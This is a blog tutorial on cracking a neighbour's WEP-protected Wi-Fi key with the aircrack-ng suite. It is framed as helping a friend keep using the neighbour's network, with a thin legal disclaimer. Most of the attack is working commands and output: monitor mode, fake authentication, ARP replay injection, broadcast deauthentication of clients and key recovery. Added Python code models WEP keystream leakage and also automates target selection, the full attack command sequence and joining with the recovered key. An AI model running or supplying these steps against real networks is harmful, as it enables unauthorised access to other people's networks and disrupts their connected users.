Cracking wifi password


THIS TUTORIAL IS NOT INTENDED TO HARM OTHER PEOPLE!!!! This is for informative purposes only; use it at your own risk.

CRACKING SOMEONE ELSE'S PASSWORD WITHOUT THEIR PERMISSION IS ILLEGAL.... Stay Safe..

One day, my friend called me up because he couldn't connect to his neighbor's wireless network any more.
He had been playing with the network settings and broke everything. He didn't know the key for the wireless access point because it is in the attic and we couldn't reach it.....

So I thought I'd give it a try and hack the access point... for HIM... he he he.

You can also do this..
BUT MAKE SURE that the neighbor is not going to file an FIR against you... he he..

Following are the steps; follow them and you will get the key of the WAP (Wireless Access Point), provided it uses WEP.
The first thing is to check your laptop and make sure that the wireless network you wish to crack is visible (say wifi9/7)...
Before you start cracking you need to install a package, as shown below..
THE PROCESS BEGINS NOW..


Step (1). Installation of aircrack-ng

Open your shell prompt and type

sudo apt-get install aircrack-ng

Step (2). List the adapters

lokender@loki-ubuntu:~$ sudo airmon-ng

Interface    Chipset          Driver

wlan0        Intel 3945ABG    iwl3945 - [phy0]

I have only one wireless card in my laptop (wlan0), so this is obviously the card I have to use...

Step (3). Putting the wireless card in monitor mode

lokender@loki-ubuntu:~$ sudo airmon-ng start wlan0

Interface    Chipset          Driver

wlan0        Intel 3945ABG    iwl3945 - [phy0]
                              (monitor mode enabled on mon0)

mon0 is a new interface used for monitoring: it receives every 802.11 frame on the channel, not only the ones addressed to us. If we run the previous command again,
mon0 should be listed as an interface.

lokender@loki-ubuntu:~$ sudo airmon-ng

Interface    Chipset          Driver

wlan0        Intel 3945ABG    iwl3945 - [phy0]
mon0         Intel 3945ABG    iwl3945 - [phy0]

Step (4). Launching airodump-ng
airodump-ng is launched on the new interface to hop across all channels and show the wireless networks it finds:

lokender@loki-ubuntu:~$ sudo airodump-ng mon0

 CH  2 ][ Elapsed: 24 s ][ 2010-02-08 19:43

 BSSID              PWR  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:21:91:F2:06:D9   -1        0      0    0  123  -1
 00:1D:7E:43:52:33  -48       61     52    2    1  54e  WPA2 CCMP   PSK  cisco
 00:1B:11:6E:78:6D  -79       72      0    0    9  54   WEP  WEP         wifi6-2
 00:24:01:65:97:69  -79       54      0    0    6  54   WEP  WEP         wifi9/7
 00:1D:19:23:BC:57  -84       19     14    0    9  54   WPA2 CCMP   PSK  GCS
 00:23:EE:CB:5A:61  -87       10      1    0   11  54e  WPA  TKIP   PSK  telen
 00:21:91:F3:7D:B6  -88        4      0    0    9  54   WEP  WEP         WIFI 18

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:21:91:F2:06:D9  00:24:2B:8B:4F:81  -83    0 - 1     0       39  baranilew,bbox2-b0c7,default
 00:1D:7E:43:52:33  00:1B:77:D9:A9:52    0  54e-54e     0       49  cisco

The network I want to hack (wifi9/7) is listed, and it is secured with WEP. That is what makes the rest of this tutorial work: WEP encrypts every frame with RC4 under a 24-bit IV that is sent in the clear, so after enough frames have been captured the key can be computed statistically from the IVs. If the network had been WPA/WPA2, none of the following steps would apply; there you have to capture the 4-way handshake and then guess the passphrase from a dictionary, which only succeeds if the passphrase is weak.
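As an added illustration of why WEP falls to this attack (example code written for this page, not part of the original tutorial and not aircrack-ng's code): a minimal model of WEP framing on top of RC4, using the 40-bit key 06469 that the page recovers at the end. The IV, the ARP body and the second frame are constructed here. It shows the two facts the ARP replay and aircrack-ng steps below rely on: every frame carries its 3-byte IV in the clear and is encrypted under IV || key, so known plaintext (the LLC/SNAP header every ARP packet starts with) gives keystream bytes for that IV without knowing the key, and any other frame reusing the same IV is encrypted with exactly the same keystream. aircrack-ng's PTW attack does the next step, which is not implemented here: it takes tens of thousands of such (IV, keystream) pairs and recovers the root key statistically.

```python
"""Model of WEP's RC4 framing, to show why captured IVs leak the key.
Added example for this page; not the tutorial's code and not aircrack-ng's.
Root key 06469 is the one found on the page; IVs and packets are constructed."""
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key scheduling (KSA) with `key`, then the PRGA keystream XORed onto `data`."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(root_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: 3-byte IV and a key-index byte sent in the clear, followed by
    RC4 under (IV || root key) over plaintext || ICV (CRC-32, little-endian).
    The root key is 5 bytes (40-bit, sold as "64-bit WEP") or 13 bytes (104-bit, "128-bit")."""
    if len(iv) != 3 or len(root_key) not in (5, 13):
        raise ValueError("IV must be 3 bytes and the key 5 or 13 bytes")
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    return iv + b"\x00" + rc4(iv + root_key, plaintext + icv)


def wep_decrypt(root_key: bytes, frame: bytes) -> bytes:
    """Inverse of wep_encrypt; raises if the ICV does not check out."""
    iv, body = frame[:3], frame[4:]
    plain = rc4(iv + root_key, body)
    data, icv = plain[:-4], plain[-4:]
    if zlib.crc32(data).to_bytes(4, "little") != icv:
        raise ValueError("ICV mismatch: wrong key or corrupted frame")
    return data


# Every ARP packet inside a WEP frame starts with this LLC/SNAP header. It is a
# public constant, which is why ARP traffic is the known plaintext of choice.
ARP_LLC_SNAP = bytes.fromhex("aaaa030000000806")


def keystream_prefix(frame: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext recovery: ciphertext XOR known plaintext = RC4 keystream for
    this frame's IV. No key needed. (IV, keystream bytes) pairs like this are the
    input of the FMS/PTW attacks that aircrack-ng runs over the .ivs file."""
    body = frame[4:4 + len(known_plaintext)]
    return bytes(c ^ p for c, p in zip(body, known_plaintext))


def demo(root_key: bytes = b"06469") -> dict:
    """Two frames under one IV: keystream learned from the first decrypts the second."""
    iv = bytes.fromhex("0a1b2c")                  # constructed IV; only 2**24 values exist
    arp_request = ARP_LLC_SNAP + bytes(28)        # hypothetical ARP body after the header
    other_frame = bytes.fromhex("aaaa030000000800") + b"IP payload"  # constructed, same IV

    f1 = wep_encrypt(root_key, iv, arp_request)
    f2 = wep_encrypt(root_key, iv, other_frame)

    ks = keystream_prefix(f1, ARP_LLC_SNAP)       # 8 keystream bytes for IV 0a1b2c
    leaked = bytes(c ^ k for c, k in zip(f2[4:12], ks))  # same IV, same keystream
    return {
        "iv": f1[:3].hex(),
        "per_packet_key_bits": 8 * (3 + len(root_key)),   # 64, of which 24 are public
        "keystream_prefix": ks.hex(),
        "leaked_from_other_frame": leaked.hex(),
        "ethertype_in_other_frame": hex(int.from_bytes(leaked[6:8], "big")),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

demo() returns the keystream bytes recovered without the key and the header it exposes in the second frame (ethertype 0x0800, an IP packet). With 2**24 IVs and a busy network, IV repeats are a matter of minutes, and the per-packet key is only 64 bits of which 24 are public; that structural weakness, not a weak passphrase, is what the attack exploits.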

Step (5). Running airodump-ng again on one channel
Running airodump-ng again, but now locked to the channel used by the network we are going to crack, in this case 6:

lokender@loki-ubuntu:~$ sudo airodump-ng --channel 6 mon0

 CH  6 ][ Elapsed: 16 s ][ 2010-02-08 19:51 ][ fixed channel mon0: 1

 BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:21:91:F2:06:D9   -1   0        0      0    0  133  -1
 00:1D:7E:43:52:33  -34   1       10      1    0    1  54e  WPA2 CCMP   PSK  cisco
 00:24:01:65:97:69  -75  96      117      0    0    6  54   WEP  WEP         wifi9/7

 BSSID              STATION            PWR   Rate   Lost  Packets  Probes

 00:21:91:F2:06:D9  00:24:2B:8B:4F:81  -85   0 - 5     0        7  default
 00:1D:7E:43:52:33  00:1B:77:D9:A9:52    0   1e- 1     0       10  cisco


Leave that screen running and open a new prompt to do a fake authentication against the access point. The value after -a is the BSSID (MAC address) of the network we want to crack, the -e value is its ESSID (name). This associates our card with the AP so that it accepts the packets we inject later.

lokender@loki-ubuntu:~$ sudo aireplay-ng --fakeauth 0 -a 00:24:01:65:97:69 -e wifi9/7 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
19:56:24 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6

19:56:24 Sending Authentication Request (Open System) [ACK]
19:56:24 Authentication successful
19:56:24 Sending Association Request [ACK]
19:56:24 Association successful :-) (AID: 1)

The association is successful. This means the target AP doesn't use MAC filtering, which is good: I don't need to spoof my MAC address. If the fake authentication had failed, the usual workaround is to pass -h with the MAC of a client already seen in airodump-ng's station list.

Now everything is ready to crack the key.

If airodump-ng is still running in your first console, stop it and start it again with the options to save the output to a file (-w gives the file name prefix, -i saves only the IVs, which is all aircrack-ng needs):

lokender@loki-ubuntu:~$ sudo airodump-ng --channel 6 -w /home/wim/crackwepwifi -i mon0

 CH  6 ][ Elapsed: 0 s ][ 2010-02-08 20:01

 BSSID              PWR RXQ  Beacons  #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:24:01:65:97:69  -72 100       29      4    0    6  54   WEP  WEP         wifi9/7

 BSSID              STATION            PWR   Rate   Lost  Packets  Probes

To actually crack the key I need a lot of data packets, or rather their IVs. At this point I have only 4 where I want on the order of 100000, so I have to speed things up by launching aireplay-ng in ARP replay mode (-3) in a new console window. It waits for an encrypted ARP request from the network and re-injects it over and over; every reply the AP sends back carries a fresh IV.

lokender@loki-ubuntu:~$ sudo aireplay-ng -3 -b 00:24:01:65:97:69 mon0
No source MAC (-h) specified. Using the device MAC (00:1B:77:D9:A9:52)
20:07:31 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
Saving ARP requests in replay_arp-0208-200731.cap
We can also start airodump-ng to capture replies.
Read 63 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)

Now keep aireplay-ng and airodump-ng running and launch a deauth attack. It kicks the connected clients off the AP; when they reconnect they send an ARP request, which is exactly the packet the replay attack in the other window is waiting for.

lokender@loki-ubuntu:~$ sudo aireplay-ng --deauth 0 -a 00:24:01:65:97:69 mon0
20:10:02 Waiting for beacon frame (BSSID: 00:24:01:65:97:69) on channel 6
NB: this attack is more effective when targeting a connected wireless client (-c ).
20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:02 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]
20:10:03 Sending DeAuth to broadcast -- BSSID: [00:24:01:65:97:69]

Let everything run. After a few minutes we will see ARP requests arriving and the #Data count climbing very fast. I noticed it went a little faster when I tried to connect to the target network from Ubuntu.
When enough packets have been captured, it's time to crack the key.

Step (6). Final Cracking

Open a new console/prompt and run the following command, where crackwepwifi-02.ivs is the file airodump-ng wrote: it appends a sequence number (-01, -02, ...) to the prefix given with -w, so check with ls which file you have. -b restricts aircrack-ng to the target BSSID; it can be run while the capture is still going on and retries as more IVs arrive:

lokender@loki-ubuntu:~$ sudo aircrack-ng -0 -b 00:24:01:65:97:69 /home/loki/crackwepwifi-02.ivs
Opening /home/loki/crackwepwifi-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 88000 ivs.
KEY FOUND! [ 30:36:34:36:39 ] (ASCII: 06469 )
Decrypted correctly: 100%

Got it! The key for the network is 06469 (five bytes, i.e. a 40-bit key, the kind sold as "64-bit WEP")....he he he he he....
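To tie the steps together, here is a small helper (an added example for this page, not code from the original post or from the aircrack-ng project) that reads the CSV file airodump-ng writes next to the capture when started with -w (prefix-01.csv), keeps the WEP networks it actually heard, prints the tutorial's command sequence for the strongest one, pulls the key out of aircrack-ng's KEY FOUND line, and turns it into the wpa_supplicant stanza your friend needs to get back on the network. SAMPLE_CSV and SAMPLE_CRACK are constructed from the networks and the result shown on this page; mon0 and the crackwepwifi prefix are the tutorial's.

```python
"""Helpers around the tutorial's aircrack-ng workflow. Added example for this page;
not the tutorial's code and not part of the aircrack-ng project.
SAMPLE_CSV and SAMPLE_CRACK are constructed from the networks shown on the page."""
import csv
import io
import re
import shlex

# airodump-ng writes <prefix>-01.csv next to the capture when run with -w.
# Constructed sample: the networks from the first airodump-ng screen above.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:21:91:F2:06:D9, 2010-02-08 19:43:02, 2010-02-08 19:43:26, 123, -1, , , , -1, 0, 0, 0. 0. 0. 0, 0, ,
00:1D:7E:43:52:33, 2010-02-08 19:43:02, 2010-02-08 19:43:26, 1, 54, WPA2, CCMP, PSK, -48, 61, 52, 0. 0. 0. 0, 5, cisco,
00:1B:11:6E:78:6D, 2010-02-08 19:43:03, 2010-02-08 19:43:26, 9, 54, WEP, WEP, , -79, 72, 0, 0. 0. 0. 0, 7, wifi6-2,
00:24:01:65:97:69, 2010-02-08 19:43:03, 2010-02-08 19:43:26, 6, 54, WEP, WEP, , -75, 54, 0, 0. 0. 0. 0, 7, wifi9/7,
00:21:91:F3:7D:B6, 2010-02-08 19:43:05, 2010-02-08 19:43:26, 9, 54, WEP, WEP, , -88, 4, 0, 0. 0. 0. 0, 7, WIFI 18,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1B:77:D9:A9:52, 2010-02-08 19:43:02, 2010-02-08 19:43:26, 0, 49, 00:1D:7E:43:52:33, cisco
"""

# The line aircrack-ng printed on the page.
SAMPLE_CRACK = "KEY FOUND! [ 30:36:34:36:39 ] (ASCII: 06469 )"

KEY_RE = re.compile(r"KEY FOUND!\s*\[\s*([0-9A-Fa-f:]+)\s*\]")


def parse_airodump_csv(text: str) -> list:
    """Access-point rows of an airodump-ng CSV as dicts keyed by the header names.
    The station section that follows the blank line is skipped."""
    aps, fields = [], None
    for row in csv.reader(io.StringIO(text), skipinitialspace=True):
        cells = [c.strip() for c in row]
        if not any(cells):
            continue
        if cells[0] == "BSSID":
            fields = cells
            continue
        if cells[0] == "Station MAC":
            break
        if fields:
            aps.append(dict(zip(fields, cells)))   # trailing empty cell is dropped by zip
    return aps


def wep_targets(aps: list) -> list:
    """Reachable WEP networks, strongest first. PWR -1 means the AP was only inferred from
    a client and never heard directly, so it cannot be attacked from here."""
    out = []
    for ap in aps:
        if "WEP" not in ap.get("Privacy", ""):
            continue
        power, channel = int(ap["Power"]), int(ap["channel"])
        if power == -1 or channel < 1:
            continue
        out.append({"bssid": ap["BSSID"], "channel": channel, "essid": ap["ESSID"],
                    "power": power, "ivs": int(ap["# IV"] or 0)})
    return sorted(out, key=lambda t: t["power"], reverse=True)


def attack_commands(target: dict, mon: str = "mon0", prefix: str = "crackwepwifi") -> list:
    """The tutorial's command sequence for one target, in the order the page runs them."""
    b, e, ch = target["bssid"], shlex.quote(target["essid"]), target["channel"]
    return [
        f"sudo airodump-ng --channel {ch} -w {prefix} -i {mon}",
        f"sudo aireplay-ng --fakeauth 0 -a {b} -e {e} {mon}",
        f"sudo aireplay-ng -3 -b {b} {mon}",
        f"sudo aireplay-ng --deauth 0 -a {b} {mon}",
        f"sudo aircrack-ng -b {b} {prefix}-01.ivs",
    ]


def parse_key(aircrack_output: str):
    """The key bytes from aircrack-ng's 'KEY FOUND!' line, or None if it did not find one."""
    m = KEY_RE.search(aircrack_output)
    if not m:
        return None
    key = bytes.fromhex(m.group(1).replace(":", ""))
    if len(key) not in (5, 13):
        raise ValueError(f"unexpected WEP key length {len(key)}")
    return key


def wpa_supplicant_block(essid: str, key: bytes) -> str:
    """wpa_supplicant.conf network stanza to join the WEP network with the recovered key
    (an unquoted wep_key0 is hex, so keys with non-printable bytes work too)."""
    return "\n".join([
        "network={",
        f'    ssid="{essid}"',
        "    key_mgmt=NONE",
        f"    wep_key0={key.hex()}",
        "    wep_tx_keyidx=0",
        "}",
    ])


if __name__ == "__main__":
    targets = wep_targets(parse_airodump_csv(SAMPLE_CSV))
    for t in targets:
        print(f"{t['bssid']}  ch {t['channel']:>2}  {t['power']:>4} dBm  {t['essid']}")
    print("\n".join(attack_commands(targets[0])))
    print(wpa_supplicant_block(targets[0]["essid"], parse_key(SAMPLE_CRACK)))
```

The -01 suffix in the last command assumes the first run with that prefix; airodump-ng increments it on every run, which is why the page ends up with crackwepwifi-02.ivs. --deauth 0 means "keep sending", so stop it with Ctrl-C once the #Data counter is climbing.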

Comments are invited!!!!

1 comment:

  1. nice .. another good way to access wiFY.... good research ... keep it up
